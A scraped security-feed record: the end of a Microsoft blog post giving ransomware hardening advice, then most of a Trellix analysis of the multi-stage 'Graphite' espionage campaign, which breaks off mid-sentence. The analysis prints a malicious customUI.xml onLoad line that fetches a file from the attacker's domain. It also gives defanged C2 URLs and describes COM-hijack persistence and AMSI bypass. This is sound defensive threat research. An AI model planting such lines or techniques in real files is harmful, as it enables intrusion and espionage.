isn\u2019t just limited to a domain administrator logging in interactively to a workstation. Because attackers have accessed and explored many networks during their attacks, they have a deep knowledge of common network configurations and use it to their advantage. One common misconfiguration they exploit is running services and scheduled tasks as highly privileged service accounts.\n\nToo often, a legacy configuration ensures that a mission-critical application works by giving the utmost permissions possible. Many organizations struggle to fix this issue even if they know about it, because they fear they might break applications. This configuration is especially dangerous as it leaves highly privileged credentials exposed in the LSA Secrets portion of the registry, which users with administrative access can access. In organizations where the local administrator rights haven\u2019t been removed from end users, attackers can be one hop away from domain admin just from an initial attack like a banking trojan. Building credential hygiene is developing a logical segmentation of the network, based on privileges, that can be implemented alongside network segmentation to limit lateral movement.\n\n**Here are some steps organizations can take to build credential hygiene:**\n\n * Aim to run services as Local System when administrative privileges are needed, as this allows applications to have high privileges locally but can\u2019t be used to move laterally. Run services as Network Service when accessing other resources.\n * Use tools like [LUA Buglight](<https://techcommunity.microsoft.com/t5/windows-blog-archive/lua-buglight-2-3-with-support-for-windows-8-1-and-windows-10/ba-p/701459>) to determine the privileges that applications really need.\n * Look for events with EventID 4624 where [the logon type](<https://twitter.com/jepayneMSFT/status/1012815189345857536>) is 2, 4, 5, or 10 _and_ the account is highly privileged like a domain admin. This helps admins understand which credentials are vulnerable to theft via LSASS or LSA Secrets. Ideally, any highly privileged account like a Domain Admin shouldn\u2019t be exposed on member servers or workstations.\n * Monitor for EventID 4625 (Logon Failed events) in Windows Event Forwarding when removing accounts from privileged groups. Adding them to the local administrator group on a limited set of machines to keep an application running still reduces the scope of an attack as against running them as Domain Admin.\n * Randomize Local Administrator passwords with a tool like [Local Administrator Password S](<https://aka.ms/laps>)olution (LAPS) to prevent lateral movement using local accounts with shared passwords.\n * Use a [cloud-based identity security solution](<https://docs.microsoft.com/defender-for-identity/what-is>) that leverages on-premises Active Directory signals get visibility into identity configurations and to identify and detect threats or compromised identities\n\n### Auditing credential exposure\n\nAuditing credential exposure is critical in preventing ransomware attacks and cybercrime in general. [BloodHound](<https://github.com/BloodHoundAD/BloodHound>) is a tool that was originally designed to provide network defenders with insight into the number of administrators in their environment. It can also be a powerful tool in reducing privileges tied to administrative account and understanding your credential exposure. IT security teams and SOCs can work together with the authorized use of this tool to enable the reduction of exposed credentials. Any teams deploying BloodHound should monitor it carefully for malicious use. They can also use [this detection guidance](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726>) to watch for malicious use.\n\nMicrosoft has observed ransomware attackers also using BloodHound in attacks. When used maliciously, BloodHound allows attackers to see the path of least resistance from the systems they have access, to highly privileged accounts like domain admin accounts and global administrator accounts in Azure.\n\n### Prioritizing deployment of Active Directory updates\n\nSecurity patches for Active Directory should be applied as soon as possible after they are released. Microsoft has witnessed ransomware attackers adopting authentication vulnerabilities within one hour of being made public and as soon as those vulnerabilities are included in tools like Mimikatz. Ransomware activity groups also rapidly adopt vulnerabilities related to authentication, such as ZeroLogon and PetitPotam, especially when they are included in toolkits like Mimikatz. When unpatched, these vulnerabilities could allow attackers to rapidly escalate from an entrance vector like email to Domain Admin level privileges.\n\n### Cloud hardening\n\nAs attackers move towards cloud resources, it\u2019s important to secure cloud resources and identities as well as on-premises accounts. Here are ways organizations can harden cloud environments:\n\n**Cloud identity hardening**\n\n * Implement the [Azure Security Benchmark](<https://docs.microsoft.com/security/benchmark/azure/>) and general [best practices for securing identity infrastructure](<https://docs.microsoft.com/azure/security/fundamentals/identity-management-best-practices>), including:\n * Prevent on-premises service accounts from having direct rights to the cloud resources to prevent lateral movement to the cloud.\n * Ensure that \u201cbreak glass\u201d account passwords are stored offline and configure honey-token activity for account usage.\n * Implement [Conditional Access policies](<https://docs.microsoft.com/azure/active-directory/conditional-access/plan-conditional-access>) enforcing [Microsoft\u2019s Zero Trust principles](<https://www.microsoft.com/security/business/zero-trust>).\n * Enable [risk-based user sign-in protection](<https://docs.microsoft.com/azure/active-directory/authentication/tutorial-risk-based-sspr-mfa>) and automate threat response to block high-risk sign-ins from all locations and enable MFA for medium-risk ones.\n * Ensure that VPN access is protected via [modern authentication methods](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#step-1-enable-modern-authentication-in-your-directory>).\n\n**Multifactor authentication (MFA)**\n\n * Enforce MFA on all accounts, remove users excluded from MFA, and strictly r[equire MFA](<https://docs.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy>) from all devices, in all locations, at all times.\n * Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for the different authentication methods and features.\n * [Identify and secure workload identities](<https://docs.microsoft.com/azure/active-directory/identity-protection/concept-workload-identity-risk>) to secure accounts where traditional MFA enforcement does not apply.\n * Ensure that users are properly educated on not accepting unexpected two-factor authentication (2FA).\n * For MFA that uses authenticator apps, ensure that the app requires a code to be typed in where possible, as many intrusions where MFA was enabled (including those by DEV-0537) still succeeded due to users clicking \u201cYes\u201d on the prompt on their phones even when they were not at their [computers](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match>). Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for an example.\n * Disable [legacy authentication](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#moving-away-from-legacy-authentication>).\n\n**Cloud admins**\n\n * Ensure cloud admins/tenant admins are treated with [the same level of security and credential hygiene](<https://docs.microsoft.com/azure/active-directory/roles/best-practices>) as Domain Admins.\n * Address [gaps in authentication coverage](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-authentication-find-coverage-gaps>).\n\n### Addressing security blind spots\n\nIn almost every observed ransomware incident, at least one system involved in the attack had a misconfigured security product that allowed the attacker to disable protections or evade detection. In many instances, the initial access for access brokers is a legacy system that isn\u2019t protected by antivirus or EDR solutions. It\u2019s important to understand that the lack security controls on these systems that have access to highly privileged credentials act as blind spots that allow attackers to perform the entire ransomware and exfiltration attack chain from a single system without being detected. In some instances, this is specifically advertised as a feature that access brokers sell.\n\nOrganizations should review and verify that security tools are running in their most secure configuration and perform regular network scans to ensure appropriate security products are monitoring and protecting all systems, including servers. If this isn\u2019t possible, make sure that your legacy systems are either physically isolated through a firewall or logically isolated by ensuring they have no credential overlap with other systems.\n\nFor Microsoft 365 Defender customers, the following checklist eliminates security blind spots:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.\n * Enable [network protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.\n * Use [device discovery](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.\n * [Protect user identities and credentials](<https://docs.microsoft.com/defender-for-identity/what-is>) using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.\n\n### Reducing the attack surface\n\nMicrosoft 365 Defender customers can turn on [attack surface reduction rules](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide>) to prevent common attack techniques used in ransomware attacks. These rules, which can be configured by all Microsoft Defender Antivirus customers and not just those using the EDR solution, offer significant hardening against attacks. In observed attacks from several ransomware-associated activity groups, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevented hands-on-keyboard activity:\n\n * Common entry vectors:\n * [Block all Office applications from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block Office communication application from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-communication-application-from-creating-child-processes>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block Office applications from injecting code into other processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-injecting-code-into-other-processes>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * Ransomware deployment and lateral movement stage (in order of impact based on the stage in attack they prevent):\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)\n * [Block process creations originating from PsExec and WMI commands](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n * [Use advanced protection against ransomware](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#use-advanced-protection-against-ransomware>)\n\nIn addition, Microsoft has changed the [default behavior of Office applications to block macros](<https://docs.microsoft.com/DeployOffice/security/internet-macros-blocked>) in files from the internet, further reduce the attack surface for many human-operated ransomware attacks and other threats.\n\n### Hardening internet-facing assets and understanding your perimeter\n\nOrganizations must identify and secure perimeter systems that attackers might use to access the network. Public scanning interfaces, such as [RiskIQ](<https://www.riskiq.com/what-is-attack-surface-management/>), can be used to augment data. Some systems that should be considered of interest to attackers and therefore need to be hardened include:\n\n * Secure Remote Desktop Protocol (RDP) or Windows Virtual Desktop endpoints with MFA to harden against password spray or brute force attacks.\n * Block Remote IT management tools such as Teamviewer, Splashtop, Remote Manipulator System, Anydesk, Atera Remote Management, and ngrok.io via network blocking such as perimeter firewall rules if not in use in your environment. If these systems are used in your environment, enforce security settings where possible to implement MFA.\n\nRansomware attackers and access brokers also use unpatched vulnerabilities, whether already disclosed or zero-day, especially in the initial access stage. Even older vulnerabilities were implicated in ransomware incidents in 2022 because some systems remained unpatched, partially patched, or because access brokers had established persistence on a previously compromised systems despite it later being patched.\n\nSome observed vulnerabilities used in campaigns between 2020 and 2022 that defenders can check for and mitigate include:\n\n * Citrix ADC systems affected by [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)\n * [Pulse Secure VPN systems](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) affected by [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>), [CVE-2020-8260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8260>), [CVE-2020-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8243>), [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), [CVE-2021-22894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22894>), [CVE-2021-22899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22899>), and [CVE-2021-22900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22900>)\n * SonicWall SSLVPN affected by [CVE-2021-20016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20016>)\n * Microsoft SharePoint servers affected by [CVE-2019-0604](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2019-0604>)\n * Unpatched [Microsoft Exchange servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>)\n * Zoho ManageEngine systems affected by [CVE-2020-10189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189>)\n * FortiGate VPN servers affected by [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)\n * Apache log4j [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\nRansomware attackers also rapidly [adopt new vulnerabilities](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). To further reduce organizational exposure, Microsoft Defender for Endpoint customers can use the [threat and vulnerability management](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations.\n\n## Microsoft 365 Defender: Deep cross-domain visibility and unified investigation capabilities to defend against ransomware attacks\n\nThe multi-faceted threat of ransomware requires a comprehensive approach to security. The steps we outlined above defend against common attack patterns and will go a long way in preventing ransomware attacks. [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) is designed to make it easy for organizations to apply many of these security controls.\n\nMicrosoft 365 Defender\u2019s industry-leading visibility and detection capabilities, demonstrated in the recent [MITRE Engenuity ATT&CK\u00ae Evaluations](<https://www.microsoft.com/security/blog/2022/04/05/microsoft-365-defender-demonstrates-industry-leading-protection-in-the-2022-mitre-engenuity-attck-evaluations/>), automatically stop most common threats and attacker techniques. To equip organizations with the tools to combat human-operated ransomware, which by nature takes a unique path for every organization, Microsoft 365 Defender provides rich investigation features that enable defenders to seamlessly inspect and remediate malicious behavior across domains.\n\n[Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)\n\nIn line with the recently announced expansion into a new service category called [**Microsoft Security Experts**](<https://www.microsoft.com/en-us/security/business/services>), we're introducing the availability of [Microsoft Defender Experts for Hunting](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/defenderexpertsforhuntingprev>) for public preview. Defender Experts for Hunting is for customers who have a robust security operations center but want Microsoft to help them proactively hunt for threats across Microsoft Defender data, including endpoints, Office 365, cloud applications, and identity.\n\nJoin our research team at the **Microsoft Security Summit** digital event on May 12 to learn what developments Microsoft is seeing in the threat landscape, as well as how we can help your business mitigate these types of attacks. Ask your most pressing questions during the live chat Q&A. [Register today.](<https://mssecuritysummit.eventcore.com?ocid=AID3046765_QSG_584073>)\n\nThe post [Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-09T13:00:00", "type": "mmpc", "title": "Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-20016", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-31207", "CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-05-09T13:00:00", "id": "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "href": "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trellix": [{"lastseen": "2022-01-25T00:00:00", "description": "# Prime Minister\u2019s Office Compromised: Details of Recent Espionage Campaign\n\nBy Marc Elias \u00b7 January 25, 2022\n\nA special thanks to Christiaan Beek, Alexandre Mundo, Leandro Velasco and Max Kersten for malware analysis and support during this investigation.\n\n#### Executive Summary\n\nOur Advanced Threat Research Team have identified a multi-stage espionage campaign targeting high-ranking government officials Western Asia and Eastern Europe. As we detail the technical components of this attack, we can confirm that we have undertaken pre-release disclosure to the victims and provided all necessary content required to remove all known attack components from their environments. \n\nThe infection chain starts with the execution of an Excel downloader, most likely sent to the victim via email, which exploits an MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-defender-blog-mshtml-cve-2021-40444/>)) to execute a malicious executable in memory. The attack uses a follow-up piece of malware called Graphite because it uses Microsoft\u2019s Graph API to leverage OneDrive as a command and control server\u2014a technique our team has not seen before. Furthermore, the attack was split into multiple stages to stay as hidden as possible. \n\nCommand and control functions used an Empire server that was prepared in July 2021, and the actual campaign was active from October to November 2021. The below blog will explain the inner workings, victimology, infrastructure and timeline of the attack and, of course, reveal the IOCs and MITRE ATT&CK techniques.\n\nA number of the attack indicators and apparent geopolitical objectives resemble those associated with the previously uncovered threat actor APT28. While we don\u2019t believe in attributing any campaign solely based on such evidence, we have a moderate level of confidence that our assumption is accurate. That said, we are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were setup.\n\nTrellix customers are protected by the different McAfee Enterprise and FireEye products that were provided with these indicators.\n\n#### Analysis of the Attack Process\n\nThis section provides an analysis of the overall process of the attack, beginning with the execution of an Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-defender-blog-mshtml-cve-2021-40444/>)) vulnerability. This is used to execute a malicious DLL file acting as a downloader for the third stage malware we called Graphite. Graphite is a newly discovered malware sample based on a OneDrive Empire Stager which leverages OneDrive accounts as a command and control server via the Microsoft Graph API. \n\nThe last phases of this multi-stage attack, which we believe is associated with an APT operation, includes the execution of different Empire stagers to finally download an Empire agent on victims\u2019 computers and engage the command and control server to remotely control the systems.\n\nThe following diagram shows the overall process of this attack.\n\n **Figure 1. Attack flow**\n\n### First Stage \u2013 Excel Downloaders\n\nAs suggested, the first stage of the attack likely uses a spear phishing email to lure victims into opening an Excel file, which goes by the name \u201cparliament_rew.xlsx\u201d. Below you can see the identifying information for this file:\n\nFile type | Excel Microsoft Office Open XML Format document \n---|--- \nFile name | parliament_rew.xlsx \nFile size | 19.26 KB \nCompilation time | 05/10/2021 \nMD5 | 8e2f8c95b1919651fcac7293cb704c1c \nSHA-256 | f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4 \n \n **Figure 2. Decoy text observed in the Excel file**\n\nIn analyzing this file\u2019s structure, we observed that it includes a folder named \u201ccustomUI\u201d that contains a file named \u201ccustomUI.xml\u201d. Opening this file with a text editor, we observed that the malicious document uses the \u201cCustomUI.OnLoad\u201d property of the OpenXML format to load an external file from a remote server: \n\n** <customUI xmlns**=\"http://schemas.microsoft.com/office/2006/01/customui\" onLoad='https://wordkeyvpload[.]net/keys/parliament_rew.xls!123'> </customUI>\n\nThis technique allows the attackers to bypass some antivirus scanning engines and office analysis tools, decreasing the chances of the documents being detected. \n\nThe downloaded file is again an Excel spreadsheet, but this time it is saved using the old Microsoft Office Excel 97-2003 Binary File Format (.xls). Below you can see the identifying information of the file:\n\nFile type | Microsoft Office Excel 97-2003 Binary File Format \n---|--- \nFile name | parliament_rew.xls \nFile size | 20.00 KB \nCompilation time | 05/10/2021 \nMD5 | abd182f7f7b36e9a1ea9ac210d1899df \nSHA-256 | 7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a \n \nAnalyzing the metadata objects, we can identify that the creator was using the codepage 1252 used in Western European countries and the file was created on October 5th, 2021.\n\n **Figure 3. Document metadata**\n\nLater, we analyzed the OLE objects in the document and discovered a Linked Object OLEStream Structure which contains a link to the exploit of the CVE-2021-40444 vulnerability hosted in the attackers\u2019 server. This allows the document to automatically download the HTML file and subsequently call the Internet Explorer engine to interpret it, triggering the execution of the exploit.\n\n **Figure 4. Remote link in OLE object**\n\nIn this blog post we won\u2019t examine the internals of the CVE-2021-40444 vulnerability as it has already been publicly explained and discussed. Instead, we will continue the analysis on the second stage DLL contained in the CAB file of the exploit.\n\n#### Second Stage \u2013 DLL Downloader\n\nThe second stage is a DLL executable named fontsubc.dll which was extracted from the CAB file used in the exploit mentioned before. You can see the identifying information of the file below:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | fontsubc.dll \nFile size | 88.50 KB \nCompilation time | 28/09/2021 \nMD5 | 81de02d6e6fca8e16f2914ebd2176b78 \nSHA-256 | 1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40 \n \nThis file exports a function called \u201cCPlApplet\u201d that Windows recognizes as a control panel application. Primarily, this acts a downloader for the next stage malware which is located at hxxps://wordkeyvpload[.]net/keys/update[.]dat using COM Objects and the API \u201cURLOpenBlockingStreamW\u201d. \n\n **Figure 5. Download of next stage malware**\n\nAfter downloading the file, the malware will decrypt it with an embedded RSA Public Key and check its integrity calculating a SHA-256 of the decrypted payload. Lastly, the malware will allocate virtual memory, copy the payload to it and execute it.\n\n **Figure 6. Payload decryption and execution**\n\nBefore executing the downloaded payload, the malware will compare the first four bytes with the magic value DE 47 AC 45 in hexadecimal; if they are different, it won\u2019t execute the payload.\n\n **Figure 7. Malware magic value**\n\n#### Third Stage \u2013 Graphite Malware\n\nThe third stage is a DLL executable, never written to disk, named dfsvc.dll that we were able to extract from the memory of the previous stage. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | dfsvc.dll \nFile size | 24.00 KB \nCompilation time | 20/09/2021 \nMD5 | 0ff09c344fc672880fdb03d429c7bda4 \nSHA-256 | f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231 \n \nWe named this malware Graphite due to the use of the Microsoft Graph API to use OneDrive as command and control. It is very likely that the developers of Graphite used the Empire OneDrive Stager as a reference due to the similarities of the functionality and the file structure used in the OneDrive account of the actors.\n\n **Figure 8. Empire OneDrive stager API requests**\n\nGraphite starts by creating a mutex with the hardcoded name \u201c250gHJAWUI289382s3h3Uasuh289di\u201d to avoid double executions, decrypt the strings and resolve dynamically the APIs it will use later. Moreover, it will calculate a bot identifier to identify the infected computer which is a CRC32 checksum of the value stored in the registry key \u201cHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\ Cryptography\\MachineGuid\u201d.\n\n **Figure 9. Graphite initializations**\n\nNext, the malware will create a thread to monitor the execution of tasks and upload its results to the OneDrive account. Result files will be uploaded to the \u201cupdate\u201d folder of the attackers\u2019 OneDrive account. \n\n **Figure 10. Thread to monitor task results**\n\nAfter that, the malware will enter into an infinite loop where every 20 minutes it will obtain a new OAuth2 token to use with the Microsoft Graph API requests and determine if there are new tasks to execute in the \u201ccheck\u201d folder of the attackers\u2019 OneDrive account. \n\n **Figure 11. Request of new OAuth2 token**\n\nOnce it obtained a valid OAuth2 token, reconnaissance data is gathered containing the following information from the victims\u2019 systems:\n\n * Running processes\n * .NET CLR version from PowerShell\n * Windows OS version\n\nThe data is compressed using the LZNT1 algorithm and encrypted with a hardcoded AES-256-CBC key with a random IV. The operator tasks are encoded in the same way. Finally, the file containing the system information is uploaded to the folder \u201c{BOT_ID}/update\u201d in OneDrive with a random name.\n\n **Figure 12. Graphite encoding data**\n\nGraphite will also query for new commands by enumerating the child files in the \"check\" subdirectory. If a new file is found, it will use the Graph API to download the content of the file and decrypt it. The decrypted tasks have two fields; the first one is a unique identifier of the task and the second one specifies the command to execute.\n\nThe command value \u201c1\u201d will instruct the malware to send the system information to the command and control again, which is the attackers\u2019 OneDrive. The command value \u201c2\u201d indicates that the decrypted task is a shellcode, and the malware will create a thread to execute it.\n\n **Figure 13. Graphite commands**\n\nIf the received task is a shellcode, it will check the third field with the magic value DE 47 AC 45 in hexadecimal and, if they are different, it won\u2019t execute the payload. The rest of the bytes of the task is the shellcode that will be executed. Lastly, the task files are deleted from the OneDrive after being processed.\n\n **Figure 14. Decrypted operator task**\n\nThe diagram below summarizes the flow of the Graphite malware.\n\n **Figure 15. Graphite execution diagram**\n\n#### Fourth Stage \u2013 Empire DLL Launcher Stager\n\nThe fourth stage is a dynamic library file named csiresources.dll that we were able to extract from a task from the previous stage. The file was embedded into a Graphite shellcode task used to reflectively load the executable into the memory of the process and execute it. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | csiresources.dll \nFile size | 111.00 KB \nCompilation time | 21/09/2021 \nMD5 | 138122869fb47e3c1a0dfe66d4736f9b \nSHA-256 | 25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9 \n \nThe sample is a generated Empire DLL Launcher stager that will initialize and start the .NET CLR Runtime into an unmanaged process to execute a download-cradle to stage an Empire agent. With that, it is possible to run the Empire agent in a process that\u2019s not PowerShell.exe.\n\nFirst, the malware will check if the malware is executing from the explorer.exe process. If it is not, the malware will exit.\n\n **Figure 16. Process name check**\n\nNext, the malware will try to find the file \u201cEhStorShell.dll\u201d in the System32 folder and load it. With this, the malware makes sure that the original \u201cEhStorShell.dll\u201d file is loaded into the explorer.exe context.\n\n **Figure 17. Loading EhStorShell.dll library**\n\nThe previous operation is important because the follow-up malware will override the CLSID \u201c{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\u201d to gain persistence in the victims\u2019 system, performing a COM Hijacking technique. The aforementioned CLSID corresponds to the \u201cEnhanced Storage Shell Extension DLL\u201d and is handled by the file \u201cEhStorShell.dll\u201d.\n\nComing up next, the malware will load, initialize and start the .NET CLR Runtime, XOR decrypt the .NET next stage payload and load it into memory. Lastly, it will execute the file using the .NET Runtime.\n\n **Figure 18. Decryption of next stage malware**\n\n#### Fifth Stage \u2013 Empire PowerShell C# Stager\n\nThe fifth stage is a .NET executable named Service.exe which was embedded and encrypted in the previous stage. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (console) Intel 80386 32-bit \n---|--- \nFile size | 34.00 KB \nMD5 | 3b27fe7b346e3dabd08e618c9674e007 \nSHA-256 | d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317 \n \nThis sample is an Empire PowerShell C# Stager whose main goal is to create an instance of a PowerShell object, decrypt the embedded PowerShell script using XOR operations and decode it with Base64 before finally executing the payload with the Invoke function.\n\n **Figure 19. Fifth stage code**\n\nThe reason behind using a .NET executable to load and execute PowerShell code is to bypass security measures like AMSI, allowing execution from a process that shouldn\u2019t allow it.\n\n#### Sixth Stage \u2013 Empire HTTP PowerShell Stager\n\nThe last stage is a PowerShell script, specifically an Empire HTTP Stager, which was embedded and encrypted in the previous stage. Below you can see the identifying information of the file:\n\nFile type | Powershell script \n---|--- \nFile size | 6.00 KB \nMD5 | a81fab5cf0c2a1c66e50184c38283e0e \nSHA-256 | da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37 \n \nAs we mentioned earlier, this is the last stage of the multi-stage attack and is an HTTP stager highly obfuscated using the Invoke-Obfuscation script from Empire to make analysis difficult.\n\n **Figure 20. Obfuscated PowerShell script**\n\nThe main functionality of the script is to contact hxxp://wordkeyvpload[.]org/index[.]jsp to send the initial information about the system and connect to the URL hxxp://wordkeyvpload[.]org/index[.]php to download the encrypted Empire agent, decrypt it with AES-256 and execute it. \n\n#### Timeline of Events\n\nBased on all the activities monitored and analyzed, we provide the following timeline of events:\n\n **Figure 21. Timeline of the campaign**\n\n#### Targeting\n\nOne of the lure documents we mentioned before (named \u201cparliament_rew.xlsx\u201d) might have been aimed for targeting government employees.\n\nBesides targeting government entities, it appears this adversary also has its sights on the defense industry. Another document with the name \u201cMissions Budget.xlsx\u201d contained the text \u201cMilitary and civilian missions and operations\u201d and the 